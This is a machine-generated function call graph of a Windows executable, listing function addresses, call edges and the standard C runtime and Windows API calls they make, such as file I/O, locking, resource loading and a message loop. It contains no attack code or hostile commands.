957d7c __mtinitlocknum 46 API calls 95218->95220 95219->95195 95221 957d0b 95220->95221 95221->95219 95254 95115b 47 API calls 3 library calls 95221->95254 95255 957e58 RtlLeaveCriticalSection 95224->95255 95226 95e5de 95226->95191 95228 957d88 _flsall 95227->95228 95229 957d91 95228->95229 95230 957da9 95228->95230 95256 9581c2 47 API calls 2 library calls 95229->95256 95231 957da7 95230->95231 95237 957e11 _flsall 95230->95237 95231->95230 95259 9569d0 47 API calls std::exception::_Copy_str 95231->95259 95234 957d96 95257 95821f 47 API calls 5 library calls 95234->95257 95235 957dbd 95238 957dc4 95235->95238 95239 957dd3 95235->95239 95237->95195 95260 957c0e 47 API calls __getptd_noexit 95238->95260 95242 957cf4 __lock 46 API calls 95239->95242 95240 957d9d 95258 951145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95240->95258 95245 957dda 95242->95245 95244 957dc9 95244->95237 95246 957dfe 95245->95246 95247 957de9 InitializeCriticalSectionAndSpinCount 95245->95247 95261 951c9d 95246->95261 95248 957e04 95247->95248 95267 957e1a RtlLeaveCriticalSection _doexit 95248->95267 95251->95195 95252->95195 95253->95190 95255->95226 95256->95234 95257->95240 95259->95235 95260->95244 95262 951ca6 RtlFreeHeap 95261->95262 95263 951ccf __dosmaperr 95261->95263 95262->95263 95264 951cbb 95262->95264 95263->95248 95268 957c0e 47 API calls __getptd_noexit 95264->95268 95266 951cc1 GetLastError 95266->95263 95267->95237 95268->95266 95277 965bb1 95269->95277 95271 9663e2 95271->95203 95272->95201 95273->95203 95274->95208 95275->95210 95276->95199 95279 965bbd _flsall 95277->95279 95278 965bcf 95361 957c0e 47 API calls __getptd_noexit 95278->95361 95279->95278 95281 965c06 95279->95281 95288 965c78 95281->95288 95282 965bd4 95362 956e10 8 API calls __Wcsftime_l 95282->95362 95285 965c23 95363 965c4c RtlLeaveCriticalSection __unlock_fhandle 95285->95363 95287 965bde _flsall 95287->95271 95289 965c98 95288->95289 95290 95273b __wsopen_helper 47 API calls 95289->95290 95293 965cb4 95290->95293 95291 956e20 __invoke_watson 8 API calls 95292 9663c8 95291->95292 95294 965bb1 __wsopen_helper 104 API calls 95292->95294 95295 965cee 95293->95295 95302 965d11 95293->95302 95360 965deb 95293->95360 95296 9663e2 95294->95296 95297 957bda __set_osfhnd 47 API calls 95295->95297 95296->95285 95298 965cf3 95297->95298 95299 957c0e __set_osfhnd 47 API calls 95298->95299 95300 965d00 95299->95300 95301 956e10 __Wcsftime_l 8 API calls 95300->95301 95304 965d0a 95301->95304 95303 965dcf 95302->95303 95310 965dad 95302->95310 95305 957bda __set_osfhnd 47 API calls 95303->95305 95304->95285 95306 965dd4 95305->95306 95307 957c0e __set_osfhnd 47 API calls 95306->95307 95308 965de1 95307->95308 95309 956e10 __Wcsftime_l 8 API calls 95308->95309 95309->95360 95311 95a979 __wsopen_helper 52 API calls 95310->95311 95312 965e7b 95311->95312 95313 965ea6 95312->95313 95314 965e85 95312->95314 95315 965b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95313->95315 95316 957bda __set_osfhnd 47 API calls 95314->95316 95325 965ec8 95315->95325 95317 965e8a 95316->95317 95319 957c0e __set_osfhnd 47 API calls 95317->95319 95318 965f46 GetFileType 95320 965f93 95318->95320 95321 965f51 GetLastError 95318->95321 95323 965e94 95319->95323 95333 95ac0b __set_osfhnd 48 API calls 95320->95333 95324 957bed __dosmaperr 47 API calls 95321->95324 95322 965f14 GetLastError 95326 957bed __dosmaperr 47 API calls 95322->95326 95327 957c0e __set_osfhnd 47 API calls 95323->95327 95328 965f78 CloseHandle 95324->95328 95325->95318 95325->95322 95329 965b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95325->95329 95330 965f39 95326->95330 95327->95304 95328->95330 95331 965f86 95328->95331 95332 965f09 95329->95332 95335 957c0e __set_osfhnd 47 API calls 95330->95335 95334 957c0e __set_osfhnd 47 API calls 95331->95334 95332->95318 95332->95322 95337 965fb1 95333->95337 95336 965f8b 95334->95336 95335->95360 95336->95330 95338 95f82f __lseeki64_nolock 49 API calls 95337->95338 95339 96616c 95337->95339 95352 966032 95337->95352 95341 96601b 95338->95341 95340 96633f CloseHandle 95339->95340 95339->95360 95342 965b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95340->95342 95344 957bda __set_osfhnd 47 API calls 95341->95344 95341->95352 95343 966366 95342->95343 95345 96639a 95343->95345 95346 96636e GetLastError 95343->95346 95344->95352 95345->95360 95347 957bed __dosmaperr 47 API calls 95346->95347 95349 96637a 95347->95349 95348 95f82f 49 API calls __lseeki64_nolock 95348->95352 95353 95ab1e __free_osfhnd 48 API calls 95349->95353 95350 95ea9c __close_nolock 50 API calls 95350->95352 95351 95ee0e 59 API calls __filbuf 95351->95352 95352->95339 95352->95348 95352->95350 95352->95351 95354 966f40 __chsize_nolock 81 API calls 95352->95354 95355 95af61 __flush 78 API calls 95352->95355 95356 9661e9 95352->95356 95353->95345 95354->95352 95355->95352 95357 95ea9c __close_nolock 50 API calls 95356->95357 95358 9661f0 95357->95358 95359 957c0e __set_osfhnd 47 API calls 95358->95359 95359->95360 95360->95291 95361->95282 95362->95287 95363->95287 95368 9342f6 95364->95368 95367 9342cc LoadLibraryA GetProcAddress 95367->95119 95369 9342aa 95368->95369 95370 9342ff LoadLibraryA 95368->95370 95369->95119 95369->95367 95370->95369 95371 934310 GetProcAddress 95370->95371 95371->95369 95373 94f4ea 48 API calls 95372->95373 95374 9347c9 95373->95374 95374->95128 95376 9340a2 95375->95376 95377 934085 FindResourceExW 95375->95377 95376->95129 95377->95376 95378 9a4f16 LoadResource 95377->95378 95378->95376 95379 9a4f2b SizeofResource 95378->95379 95379->95376 95380 9a4f3f LockResource 95379->95380 95380->95376 95382 934526 95381->95382 95385 9a4fe0 95381->95385 95387 953a8d 95382->95387 95384 934534 95384->95140 95386->95129 95388 953a99 _flsall 95387->95388 95389 953aa7 95388->95389 95390 953acd 95388->95390 95400 957c0e 47 API calls __getptd_noexit 95389->95400 95402 954e1c 95390->95402 95393 953aac 95401 956e10 8 API calls __Wcsftime_l 95393->95401 95397 953ae2 95409 953b04 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95397->95409 95399 953ab7 _flsall 95399->95384 95400->95393 95401->95399 95403 954e2c 95402->95403 95404 954e4e RtlEnterCriticalSection 95402->95404 95403->95404 95405 954e34 95403->95405 95406 953ad3 95404->95406 95407 957cf4 __lock 47 API calls 95405->95407 95408 9539fe 81 API calls 5 library calls 95406->95408 95407->95406 95408->95397 95409->95399 95413 953839 95410->95413 95412 934510 95412->95148 95414 953845 _flsall 95413->95414 95415 953888 95414->95415 95416 95385b _memset 95414->95416 95425 953880 _flsall 95414->95425 95417 954e1c __lock_file 48 API calls 95415->95417 95440 957c0e 47 API calls __getptd_noexit 95416->95440 95418 95388e 95417->95418 95426 95365b 95418->95426 95421 953875 95441 956e10 8 API calls __Wcsftime_l 95421->95441 95425->95412 95427 953691 95426->95427 95431 953676 _memset 95426->95431 95442 9538c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95427->95442 95428 953681 95541 957c0e 47 API calls __getptd_noexit 95428->95541 95430 9536cf 95430->95427 95434 9537e0 _memset 95430->95434 95443 952933 95430->95443 95450 95ee0e 95430->95450 95521 95eb66 95430->95521 95543 95ec87 47 API calls 4 library calls 95430->95543 95431->95427 95431->95428 95431->95430 95544 957c0e 47 API calls __getptd_noexit 95434->95544 95438 953686 95542 956e10 8 API calls __Wcsftime_l 95438->95542 95440->95421 95441->95425 95442->95425 95444 952952 95443->95444 95445 95293d 95443->95445 95444->95430 95545 957c0e 47 API calls __getptd_noexit 95445->95545 95447 952942 95546 956e10 8 API calls __Wcsftime_l 95447->95546 95449 95294d 95449->95430 95451 95ee46 95450->95451 95452 95ee2f 95450->95452 95454 95f57e 95451->95454 95458 95ee80 95451->95458 95556 957bda 47 API calls __getptd_noexit 95452->95556 95572 957bda 47 API calls __getptd_noexit 95454->95572 95455 95ee34 95557 957c0e 47 API calls __getptd_noexit 95455->95557 95460 95ee88 95458->95460 95467 95ee9f 95458->95467 95459 95f583 95573 957c0e 47 API calls __getptd_noexit 95459->95573 95558 957bda 47 API calls __getptd_noexit 95460->95558 95463 95ee94 95574 956e10 8 API calls __Wcsftime_l 95463->95574 95464 95ee8d 95559 957c0e 47 API calls __getptd_noexit 95464->95559 95466 95eeb4 95560 957bda 47 API calls __getptd_noexit 95466->95560 95467->95466 95469 95eece 95467->95469 95471 95eeec 95467->95471 95501 95ee3b 95467->95501 95469->95466 95475 95eed9 95469->95475 95561 9569d0 47 API calls std::exception::_Copy_str 95471->95561 95547 963bf2 95475->95547 95476 95eefc 95478 95ef04 95476->95478 95479 95ef1f 95476->95479 95477 95efed 95481 95f066 ReadFile 95477->95481 95486 95f003 GetConsoleMode 95477->95486 95562 957c0e 47 API calls __getptd_noexit 95478->95562 95564 95f82f 49 API calls 3 library calls 95479->95564 95484 95f546 GetLastError 95481->95484 95485 95f088 95481->95485 95483 95ef09 95563 957bda 47 API calls __getptd_noexit 95483->95563 95489 95f553 95484->95489 95490 95f046 95484->95490 95485->95484 95495 95f058 95485->95495 95491 95f017 95486->95491 95492 95f063 95486->95492 95487 95ef2d 95487->95475 95570 957c0e 47 API calls __getptd_noexit 95489->95570 95504 95f04c 95490->95504 95565 957bed 47 API calls 2 library calls 95490->95565 95491->95492 95496 95f01d ReadConsoleW 95491->95496 95492->95481 95493 95ef14 95493->95501 95503 95f32a 95495->95503 95495->95504 95506 95f0bd 95495->95506 95496->95495 95498 95f040 GetLastError 95496->95498 95497 95f558 95571 957bda 47 API calls __getptd_noexit 95497->95571 95498->95490 95501->95430 95502 951c9d _free 47 API calls 95502->95501 95503->95504 95509 95f430 ReadFile 95503->95509 95504->95501 95504->95502 95505 95f1aa 95505->95504 95511 95f257 95505->95511 95513 95f267 95505->95513 95516 95f217 MultiByteToWideChar 95505->95516 95506->95505 95508 95f129 ReadFile 95506->95508 95510 95f14a GetLastError 95508->95510 95518 95f154 95508->95518 95514 95f453 GetLastError 95509->95514 95520 95f461 95509->95520 95510->95518 95567 957c0e 47 API calls __getptd_noexit 95511->95567 95513->95516 95568 95f82f 49 API calls 3 library calls 95513->95568 95514->95520 95516->95498 95516->95504 95518->95506 95566 95f82f 49 API calls 3 library calls 95518->95566 95520->95503 95569 95f82f 49 API calls 3 library calls 95520->95569 95522 95eb71 95521->95522 95526 95eb86 95521->95526 95605 957c0e 47 API calls __getptd_noexit 95522->95605 95524 95eb76 95606 956e10 8 API calls __Wcsftime_l 95524->95606 95528 95ebbb 95526->95528 95535 95eb81 95526->95535 95607 963e24 47 API calls __malloc_crt 95526->95607 95529 952933 __fflush_nolock 47 API calls 95528->95529 95530 95ebcf 95529->95530 95575 95ed06 95530->95575 95532 95ebd6 95533 952933 __fflush_nolock 47 API calls 95532->95533 95532->95535 95534 95ebf9 95533->95534 95534->95535 95536 952933 __fflush_nolock 47 API calls 95534->95536 95535->95430 95537 95ec05 95536->95537 95537->95535 95538 952933 __fflush_nolock 47 API calls 95537->95538 95539 95ec12 95538->95539 95540 952933 __fflush_nolock 47 API calls 95539->95540 95540->95535 95541->95438 95542->95427 95543->95430 95544->95438 95545->95447 95546->95449 95548 963bfd 95547->95548 95549 963c0a 95547->95549 95550 957c0e __set_osfhnd 47 API calls 95548->95550 95552 963c16 95549->95552 95553 957c0e __set_osfhnd 47 API calls 95549->95553 95551 963c02 95550->95551 95551->95477 95552->95477 95554 963c37 95553->95554 95555 956e10 __Wcsftime_l 8 API calls 95554->95555 95555->95551 95556->95455 95557->95501 95558->95464 95559->95463 95560->95464 95561->95476 95562->95483 95563->95493 95564->95487 95565->95504 95566->95518 95567->95504 95568->95516 95569->95520 95570->95497 95571->95504 95572->95459 95573->95463 95574->95501 95576 95ed12 _flsall 95575->95576 95577 95ed32 95576->95577 95578 95ed1a 95576->95578 95580 95eded 95577->95580 95585 95ed68 95577->95585 95579 957bda __set_osfhnd 47 API calls 95578->95579 95582 95ed1f 95579->95582 95581 957bda __set_osfhnd 47 API calls 95580->95581 95583 95edf2 95581->95583 95584 957c0e __set_osfhnd 47 API calls 95582->95584 95586 957c0e __set_osfhnd 47 API calls 95583->95586 95597 95ed27 _flsall 95584->95597 95587 95ed75 95585->95587 95588 95ed8a 95585->95588 95590 95ed82 95586->95590 95591 957bda __set_osfhnd 47 API calls 95587->95591 95589 95a8ed ___lock_fhandle 49 API calls 95588->95589 95592 95ed90 95589->95592 95596 956e10 __Wcsftime_l 8 API calls 95590->95596 95593 95ed7a 95591->95593 95594 95edb6 95592->95594 95595 95eda3 95592->95595 95598 957c0e __set_osfhnd 47 API calls 95593->95598 95600 957c0e __set_osfhnd 47 API calls 95594->95600 95599 95ee0e __filbuf 59 API calls 95595->95599 95596->95597 95597->95532 95598->95590 95601 95edaf 95599->95601 95602 95edbb 95600->95602 95604 95ede5 __filbuf RtlLeaveCriticalSection 95601->95604 95603 957bda __set_osfhnd 47 API calls 95602->95603 95603->95601 95604->95597 95605->95524 95606->95535 95607->95528 95611 95344a GetSystemTimeAsFileTime 95608->95611 95610 97bdc3 95610->95150 95612 953478 __aulldiv 95611->95612 95612->95610 95614 953e71 _flsall 95613->95614 95615 953e94 95614->95615 95616 953e7f 95614->95616 95618 954e1c __lock_file 48 API calls 95615->95618 95627 957c0e 47 API calls __getptd_noexit 95616->95627 95620 953e9a 95618->95620 95619 953e84 95628 956e10 8 API calls __Wcsftime_l 95619->95628 95629 953b0c 55 API calls 7 library calls 95620->95629 95623 953ea5 95630 953ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95623->95630 95625 953eb7 95626 953e8f _flsall 95625->95626 95626->95155 95627->95619 95628->95626 95629->95623 95630->95625 95632 951e61 95631->95632 95636 951e55 95631->95636 95655 957c0e 47 API calls __getptd_noexit 95632->95655 95634 952019 95639 951e41 95634->95639 95656 956e10 8 API calls __Wcsftime_l 95634->95656 95636->95632 95643 951ed4 95636->95643 95650 959d6b 47 API calls 2 library calls 95636->95650 95638 951fa0 95638->95632 95638->95639 95641 951fb0 95638->95641 95639->94948 95640 951f5f 95640->95632 95642 951f7b 95640->95642 95652 959d6b 47 API calls 2 library calls 95640->95652 95654 959d6b 47 API calls 2 library calls 95641->95654 95642->95632 95642->95639 95646 951f91 95642->95646 95643->95632 95649 951f41 95643->95649 95651 959d6b 47 API calls 2 library calls 95643->95651 95653 959d6b 47 API calls 2 library calls 95646->95653 95649->95638 95649->95640 95650->95643 95651->95649 95652->95642 95653->95639 95654->95639 95655->95634 95656->95639 95657->95090 95659 952aba _flsall 95658->95659 95660 952ad4 95659->95660 95661 952aec 95659->95661 95663 952ae4 _flsall 95659->95663 95736 957c0e 47 API calls __getptd_noexit 95660->95736 95664 954e1c __lock_file 48 API calls 95661->95664 95663->95093 95666 952af2 95664->95666 95665 952ad9 95737 956e10 8 API calls __Wcsftime_l 95665->95737 95724 952957 95666->95724 95672 9535f0 _flsall 95671->95672 95673 953604 95672->95673 95674 95361c 95672->95674 95893 957c0e 47 API calls __getptd_noexit 95673->95893 95677 954e1c __lock_file 48 API calls 95674->95677 95681 953614 _flsall 95674->95681 95676 953609 95894 956e10 8 API calls __Wcsftime_l 95676->95894 95678 95362e 95677->95678 95877 953578 95678->95877 95681->95094 95685 97c715 95684->95685 95686 97c6ff SetFileTime CloseHandle 95684->95686 95685->95072 95686->95685 95690 97c581 __tzset_nolock _wcscmp 95687->95690 95688 9344ed 64 API calls 95688->95690 95689 97bf5a GetSystemTimeAsFileTime 95689->95690 95690->95688 95690->95689 95691 97c05f 95690->95691 95692 934517 83 API calls 95690->95692 95691->95068 95691->95072 95692->95690 95694 97b970 95693->95694 95695 97b97e 95693->95695 95696 953499 117 API calls 95694->95696 95697 97b9c3 95695->95697 95698 953499 117 API calls 95695->95698 95708 97b987 95695->95708 95696->95695 95967 97bbe8 95697->95967 95699 97b9a8 95698->95699 95699->95697 95702 97b9b1 95699->95702 95701 97ba07 95703 97ba2c 95701->95703 95704 97ba0b 95701->95704 95705 9535e4 __fcloseall 83 API calls 95702->95705 95702->95708 95971 97b7e5 95703->95971 95707 97ba18 95704->95707 95710 9535e4 __fcloseall 83 API calls 95704->95710 95705->95708 95707->95708 95711 9535e4 __fcloseall 83 API calls 95707->95711 95708->95097 95710->95707 95711->95708 95712 97ba5a 95980 97ba8a 95712->95980 95713 97ba3a 95715 97ba47 95713->95715 95717 9535e4 __fcloseall 83 API calls 95713->95717 95715->95708 95719 9535e4 __fcloseall 83 API calls 95715->95719 95717->95715 95719->95708 95726 952966 95724->95726 95731 952984 95724->95731 95725 952974 95764 957c0e 47 API calls __getptd_noexit 95725->95764 95726->95725 95726->95731 95734 95299c _memcpy_s 95726->95734 95728 952979 95765 956e10 8 API calls __Wcsftime_l 95728->95765 95738 952b24 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95731->95738 95733 952933 __fflush_nolock 47 API calls 95733->95734 95734->95731 95734->95733 95739 95af61 95734->95739 95766 952c84 95734->95766 95772 958e63 78 API calls 6 library calls 95734->95772 95736->95665 95737->95663 95738->95663 95740 95af6d _flsall 95739->95740 95741 95af75 95740->95741 95742 95af8d 95740->95742 95846 957bda 47 API calls __getptd_noexit 95741->95846 95744 95b022 95742->95744 95748 95afbf 95742->95748 95851 957bda 47 API calls __getptd_noexit 95744->95851 95745 95af7a 95847 957c0e 47 API calls __getptd_noexit 95745->95847 95773 95a8ed 95748->95773 95749 95b027 95852 957c0e 47 API calls __getptd_noexit 95749->95852 95752 95afc5 95754 95afd8 95752->95754 95755 95afeb 95752->95755 95753 95b02f 95853 956e10 8 API calls __Wcsftime_l 95753->95853 95782 95b043 95754->95782 95848 957c0e 47 API calls __getptd_noexit 95755->95848 95758 95af82 _flsall 95758->95734 95760 95aff0 95849 957bda 47 API calls __getptd_noexit 95760->95849 95761 95afe4 95850 95b01a RtlLeaveCriticalSection __unlock_fhandle 95761->95850 95764->95728 95765->95731 95767 952c97 95766->95767 95771 952cbb 95766->95771 95768 952933 __fflush_nolock 47 API calls 95767->95768 95767->95771 95769 952cb4 95768->95769 95770 95af61 __flush 78 API calls 95769->95770 95770->95771 95771->95734 95772->95734 95774 95a8f9 _flsall 95773->95774 95775 95a946 RtlEnterCriticalSection 95774->95775 95777 957cf4 __lock 47 API calls 95774->95777 95776 95a96c _flsall 95775->95776 95776->95752 95778 95a91d 95777->95778 95779 95a928 InitializeCriticalSectionAndSpinCount 95778->95779 95780 95a93a 95778->95780 95779->95780 95854 95a970 RtlLeaveCriticalSection _doexit 95780->95854 95783 95b050 __ftell_nolock 95782->95783 95784 95b08d 95783->95784 95785 95b0ac 95783->95785 95812 95b082 95783->95812 95855 957bda 47 API calls __getptd_noexit 95784->95855 95789 95b105 95785->95789 95790 95b0e9 95785->95790 95788 95b092 95856 957c0e 47 API calls __getptd_noexit 95788->95856 95793 95b11c 95789->95793 95861 95f82f 49 API calls 3 library calls 95789->95861 95858 957bda 47 API calls __getptd_noexit 95790->95858 95791 95b86b 95791->95761 95797 963bf2 __flswbuf 47 API calls 95793->95797 95795 95b099 95857 956e10 8 API calls __Wcsftime_l 95795->95857 95800 95b12a 95797->95800 95798 95b0ee 95859 957c0e 47 API calls __getptd_noexit 95798->95859 95802 95b44b 95800->95802 95862 957a0d 47 API calls 2 library calls 95800->95862 95803 95b0f5 95869 95a70c 95812->95869 95846->95745 95847->95758 95848->95760 95849->95761 95850->95758 95851->95749 95852->95753 95853->95758 95854->95775 95855->95788 95856->95795 95857->95812 95858->95798 95859->95803 95861->95793 95870 95a714 95869->95870 95871 95a716 IsProcessorFeaturePresent 95869->95871 95870->95791 95873 9637b0 95871->95873 95876 96375f 5 API calls 2 library calls 95873->95876 95875 963893 95875->95791 95876->95875 95878 953587 95877->95878 95879 95359b 95877->95879 95923 957c0e 47 API calls __getptd_noexit 95878->95923 95881 952c84 __flush 78 API calls 95879->95881 95886 953597 95879->95886 95883 9535a7 95881->95883 95882 95358c 95924 956e10 8 API calls __Wcsftime_l 95882->95924 95896 95eb36 95883->95896 95895 953653 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95886->95895 95888 952933 __fflush_nolock 47 API calls 95889 9535b5 95888->95889 95900 95e9d2 95889->95900 95891 9535bb 95891->95886 95892 951c9d _free 47 API calls 95891->95892 95892->95886 95893->95676 95894->95681 95895->95681 95897 95eb43 95896->95897 95899 9535af 95896->95899 95898 951c9d _free 47 API calls 95897->95898 95897->95899 95898->95899 95899->95888 95901 95e9de _flsall 95900->95901 95902 95e9e6 95901->95902 95903 95e9fe 95901->95903 95940 957bda 47 API calls __getptd_noexit 95902->95940 95905 95ea7b 95903->95905 95910 95ea28 95903->95910 95944 957bda 47 API calls __getptd_noexit 95905->95944 95906 95e9eb 95941 957c0e 47 API calls __getptd_noexit 95906->95941 95909 95ea80 95945 957c0e 47 API calls __getptd_noexit 95909->95945 95912 95a8ed ___lock_fhandle 49 API calls 95910->95912 95914 95ea2e 95912->95914 95913 95ea88 95946 956e10 8 API calls __Wcsftime_l 95913->95946 95916 95ea41 95914->95916 95917 95ea4c 95914->95917 95925 95ea9c 95916->95925 95942 957c0e 47 API calls __getptd_noexit 95917->95942 95918 95e9f3 _flsall 95918->95891 95921 95ea47 95943 95ea73 RtlLeaveCriticalSection __unlock_fhandle 95921->95943 95923->95882 95924->95886 95947 95aba4 95925->95947 95928 95eaaa 95940->95906 95941->95918 95942->95921 95943->95918 95944->95909 95945->95913 95946->95918 95948 95abaf 95947->95948 95950 95abc4 95947->95950 95962 957bda 47 API calls __getptd_noexit 95948->95962 95955 95abe9 95950->95955 95964 957bda 47 API calls __getptd_noexit 95950->95964 95955->95928 95968 97bc0d 95967->95968 95970 97bbf6 _memcpy_s __tzset_nolock 95967->95970 95969 95381e __fread_nolock 64 API calls 95968->95969 95969->95970 95970->95701 95972 95395c std::exception::_Copy_str 47 API calls 95971->95972 95973 97b7f4 95972->95973 95974 95395c std::exception::_Copy_str 47 API calls 95973->95974 95975 97b808 95974->95975 95976 95395c std::exception::_Copy_str 47 API calls 95975->95976 95977 97b81c 95976->95977 95978 97bb64 47 API calls 95977->95978 95979 97b82f 95977->95979 95978->95979 95979->95712 95979->95713 95987 97baa0 95980->95987 95981 97bb51 95982 97b841 64 API calls 95982->95987 95984 97ba61 95987->95981 95987->95982 95987->95984 95996 97bc67 95987->95996 96004 97b942 64 API calls 95987->96004 96004->95987 96010 93bd3f 96009->96010 96013 93bd5a 96009->96013 96011 93bdfa 48 API calls 96010->96011 96012 93bd47 CharUpperBuffW 96011->96012 96012->96013 96013->94884 96015 9a436a 96014->96015 96016 932b8b 96014->96016 96017 94f4ea 48 API calls 96016->96017 96018 932b92 96017->96018 96019 932bb3 96018->96019 96096 932bce 48 API calls 96018->96096 96019->94904 96022 93e8f6 96021->96022 96077 93e906 Mailbox 96021->96077 96023 93ed52 96022->96023 96022->96077 96174 94e3cd 331 API calls 96023->96174 96025 93ebdd 96025->94904 96027 93ed63 96027->96025 96029 93ed70 96027->96029 96028 93e94c PeekMessageW 96028->96077 96176 94e312 331 API calls Mailbox 96029->96176 96031 9a526e Sleep 96031->96077 96032 93ed77 LockWindowUpdate DestroyWindow GetMessageW 96032->96025 96035 93eda9 96032->96035 96033 93ebc7 96033->96025 96175 932ff6 16 API calls 96033->96175 96037 9a59ef TranslateMessage DispatchMessageW GetMessageW 96035->96037 96037->96037 96038 9a5a1f 96037->96038 96038->96025 96039 93ed21 PeekMessageW 96039->96077 96040 94f4ea 48 API calls 96040->96077 96041 93ebf7 timeGetTime 96041->96077 96043 936eed 48 API calls 96043->96077 96044 9a5557 WaitForSingleObject 96049 9a5574 GetExitCodeProcess CloseHandle 96044->96049 96044->96077 96045 93ed3a TranslateMessage DispatchMessageW 96045->96039 96046 93d7f7 48 API calls 96076 9a5429 Mailbox 96046->96076 96047 932aae 307 API calls 96047->96077 96048 9a588f Sleep 96048->96076 96049->96077 96050 93edae timeGetTime 96177 931caa 49 API calls 96050->96177 96052 9a5733 Sleep 96052->96076 96055 94dc38 timeGetTime 96055->96076 96056 9a5926 GetExitCodeProcess 96059 9a593c WaitForSingleObject 96056->96059 96060 9a5952 CloseHandle 96056->96060 96058 9a5445 Sleep 96058->96077 96059->96060 96059->96077 96060->96076 96061 9a5432 Sleep 96061->96058 96062 998c4b 108 API calls 96062->96076 96063 932c79 107 API calls 96063->96076 96065 9a59ae Sleep 96065->96077 96066 931caa 49 API calls 96066->96077 96069 93ce19 48 API calls 96069->96076 96071 93fe30 307 API calls 96071->96077 96072 93d6e9 55 API calls 96072->96076 96074 9445e0 307 API calls 96074->96077 96075 943200 307 API calls 96075->96077 96076->96046 96076->96055 96076->96056 96076->96058 96076->96061 96076->96062 96076->96063 96076->96065 96076->96069 96076->96072 96076->96077 96179 974cbe 49 API calls Mailbox 96076->96179 96180 931caa 49 API calls 96076->96180 96181 932aae 331 API calls 96076->96181 96182 98ccb2 50 API calls 96076->96182 96183 977a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96076->96183 96184 976532 63 API calls 3 library calls 96076->96184 96077->96028 96077->96031 96077->96033 96077->96039 96077->96040 96077->96041 96077->96043 96077->96044 96077->96045 96077->96047 96077->96048 96077->96050 96077->96052 96077->96058 96077->96066 96077->96071 96077->96074 96077->96075 96077->96076 96079 93d6e9 55 API calls 96077->96079 96080 97cc5c 86 API calls 96077->96080 96081 93ce19 48 API calls 96077->96081 96097 93f110 96077->96097 96162 94e244 96077->96162 96167 94dc5f 96077->96167 96172 93eed0 331 API calls Mailbox 96077->96172 96173 93ef00 331 API calls 96077->96173 96178 998d23 48 API calls 96077->96178 96079->96077 96080->96077 96081->96077 96082->94904 96083->94904 96084->94904 96085->94904 96086->94904 96087->94904 96088->94904 96089->94904 96090->94904 96092 93d6f4 96091->96092 96093 93d71b 96092->96093 96206 93d764 55 API calls 96092->96206 96093->94904 96095->94904 96096->96019 96098 93f130 96097->96098 96101 93fe30 331 API calls 96098->96101 96105 93f199 96098->96105 96099 93f3dd 96103 9a87c8 96099->96103 96111 93f3f2 96099->96111 96146 93f431 Mailbox 96099->96146 96100 93f595 96108 93d7f7 48 API calls 96100->96108 96100->96146 96102 9a8728 96101->96102 96102->96105 96186 97cc5c 86 API calls 4 library calls 96102->96186 96189 97cc5c 86 API calls 4 library calls 96103->96189 96105->96099 96105->96100 96109 93d7f7 48 API calls 96105->96109 96141 93f229 96105->96141 96106 93fe30 331 API calls 96106->96146 96110 9a87a3 96108->96110 96113 9a8772 96109->96113 96188 950f0a 52 API calls __cinit 96110->96188 96138 93f418 96111->96138 96190 979af1 48 API calls 96111->96190 96112 9a8b1b 96127 9a8bcf 96112->96127 96128 9a8b2c 96112->96128 96187 950f0a 52 API calls __cinit 96113->96187 96114 97cc5c 86 API calls 96114->96146 96117 93f770 96123 9a8a45 96117->96123 96140 93f77a 96117->96140 96119 93d6e9 55 API calls 96119->96146 96120 9a8810 96191 98eef8 331 API calls 96120->96191 96121 93fe30 331 API calls 96143 93f6aa 96121->96143 96122 9a8b7e 96199 98e40a 331 API calls Mailbox 96122->96199 96196 94c1af 48 API calls 96123->96196 96124 9a8c53 96204 97cc5c 86 API calls 4 library calls 96124->96204 96201 97cc5c 86 API calls 4 library calls 96127->96201 96198 98f5ee 331 API calls 96128->96198 96129 9a8beb 96202 98bdbd 331 API calls Mailbox 96129->96202 96133 941b90 48 API calls 96133->96146 96137 941b90 48 API calls 96137->96146 96138->96112 96138->96143 96138->96146 96139 9a8c00 96161 93f537 Mailbox 96139->96161 96203 97cc5c 86 API calls 4 library calls 96139->96203 96140->96133 96141->96099 96141->96100 96141->96138 96141->96146 96142 93fce0 96142->96161 96200 97cc5c 86 API calls 4 library calls 96142->96200 96143->96117 96143->96121 96143->96142 96143->96146 96143->96161 96144 9a8823 96144->96138 96147 9a884b 96144->96147 96146->96106 96146->96114 96146->96119 96146->96122 96146->96124 96146->96129 96146->96137 96146->96142 96146->96161 96185 93dd47 48 API calls _memcpy_s 96146->96185 96197 9697ed InterlockedDecrement 96146->96197 96205 94c1af 48 API calls 96146->96205 96192 98ccdc 48 API calls 96147->96192 96151 9a8857 96153 9a8865 96151->96153 96154 9a88aa 96151->96154 96193 979b72 48 API calls 96153->96193 96157 9a88a0 Mailbox 96154->96157 96194 97a69d 48 API calls 96154->96194 96155 93fe30 331 API calls 96155->96161 96157->96155 96159 9a88e7 96195 93bc74 48 API calls 96159->96195 96161->96077 96163 94e253 96162->96163 96164 9adf42 96162->96164 96163->96077 96165 9adf77 96164->96165 96166 9adf59 TranslateAcceleratorW 96164->96166 96166->96163 96168 94dca3 96167->96168 96170 94dc71 96167->96170 96168->96077 96169 94dc96 IsDialogMessageW 96169->96168 96169->96170 96170->96168 96170->96169 96171 9add1d GetClassLongW 96170->96171 96171->96169 96171->96170 96172->96077 96173->96077 96174->96033 96175->96027 96176->96032 96177->96077 96178->96077 96179->96076 96180->96076 96181->96076 96182->96076 96183->96076 96184->96076 96185->96146 96186->96105 96187->96141 96188->96146 96189->96161 96190->96120 96191->96144 96192->96151 96193->96157 96194->96159 96195->96157 96196->96146 96197->96146 96198->96146 96199->96142 96200->96161 96201->96161 96202->96139 96203->96161 96204->96161 96205->96146 96206->96093 96207 9a19dd 96212 934a30 96207->96212 96209 9a19f1 96232 950f0a 52 API calls __cinit 96209->96232 96211 9a19fb 96213 934a40 __ftell_nolock 96212->96213 96214 93d7f7 48 API calls 96213->96214 96215 934af6 96214->96215 96233 935374 96215->96233 96217 934aff 96240 93363c 96217->96240 96220 93518c 48 API calls 96221 934b18 96220->96221 